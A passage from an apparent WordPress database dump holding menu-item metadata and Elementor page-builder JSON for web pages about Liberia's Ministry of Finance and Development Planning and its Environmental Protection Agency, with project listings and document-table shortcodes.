enu_item_template',''),(18404,2702,'_menu_item_mega_template','0'),(18405,2702,'_menu_item_nolink',''),(18406,2702,'_menu_item_category_post',''),(18407,2702,'_menu_item_megamenu',''),(18408,2702,'_menu_item_megamenu_auto_width',''),(18409,2702,'_menu_item_megamenu_col',''),(18410,2702,'_menu_item_megamenu_heading',''),(18411,2702,'_menu_item_megamenu_widgetarea','0'),(18412,2702,'_menu_item_icon',''),(18413,2702,'_elementor_controls_usage','a:0:{}'),(18414,2703,'_menu_item_type','custom'),(18415,2703,'_menu_item_menu_item_parent','0'),(18416,2703,'_menu_item_object_id','2703'),(18417,2703,'_menu_item_object','custom'),(18418,2703,'_menu_item_target','_blank'),(18419,2703,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18420,2703,'_menu_item_xfn',''),(18421,2703,'_menu_item_url','https://mfdp.gov.lr/'),(18423,2703,'_menu_item_template',''),(18424,2703,'_menu_item_mega_template','0'),(18425,2703,'_menu_item_nolink',''),(18426,2703,'_menu_item_category_post',''),(18427,2703,'_menu_item_megamenu',''),(18428,2703,'_menu_item_megamenu_auto_width',''),(18429,2703,'_menu_item_megamenu_col',''),(18430,2703,'_menu_item_megamenu_heading',''),(18431,2703,'_menu_item_megamenu_widgetarea','0'),(18432,2703,'_menu_item_icon',''),(18433,2703,'_elementor_controls_usage','a:0:{}'),(18434,2704,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(18435,2704,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(18436,2704,'slide_template','default'),(18437,2704,'slide_template','default'),(18440,2704,'_elementor_template_type','wp-post'),(18441,2704,'_elementor_template_type','wp-post'),(18442,2704,'_elementor_version','2.7.5'),(18443,2704,'_elementor_version','2.7.5'),(18444,2704,'_wp_page_template','default'),(18445,2704,'_wp_page_template','default'),(18446,2704,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.<\\/p><p>As custodian of the country\\u2019s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18447,2704,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.<\\/p><p>As custodian of the country\\u2019s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mfdp\\\",\\\"tag_id\\\":\\\"188\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mfdp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mfdp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18453,2704,'_dp_original','1582'),(18454,2704,'_edit_lock','1663165715:42'),(18455,2704,'_edit_last','42'),(18456,2705,'_elementor_edit_mode','builder'),(18457,2705,'_elementor_template_type','wp-post'),(18458,2705,'_elementor_version','2.7.5'),(18459,2705,'_wp_page_template','default'),(18460,2705,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18461,2705,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s